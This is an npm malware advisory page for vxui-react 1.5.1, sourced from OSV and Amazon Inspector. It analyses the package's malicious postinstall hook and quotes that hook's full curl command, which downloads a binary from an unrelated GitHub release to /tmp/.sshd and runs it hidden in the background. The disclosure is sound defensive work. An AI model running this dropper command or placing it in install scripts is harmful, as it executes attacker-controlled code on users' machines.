npm

vxui-react @1.5.1

Vulnerability report · Last retrieved from osv.dev July 8, 2026 at 10:24 PM UTC

Malicious

OSV ID

MAL-2026-4793

Ecosystem

npm

Summary

On npm install , package.json's postinstall script runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd & . The fetch disables TLS verification ( -k ), silences errors, points at an unpinned latest release on a GitHub account ( parikhpreyash4 ) unrelated to the package's declared repository ( tmplink/vxui_react ), verifies no hash, drops the binary at a hidden path masquerading as the ssh daemon ( /tmp/.sshd ), and backgrounds it so the install completes without surfacing the child process. Every installer running npm install vxui-react thereby executes arbitrary attacker-controlled code on their machine. The package additionally lists itself ( vxui-react: ^1.3.1 ) in its own dependencies , an unusual shape consistent with namespace/dependency-graph manipulation; the dropper above is the primary harm.

Source: amazon-inspector (4af2c5e995ae069d3037f1310d055fac142dd6bb2ccd5ecb7e7f9a518e8022f0)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.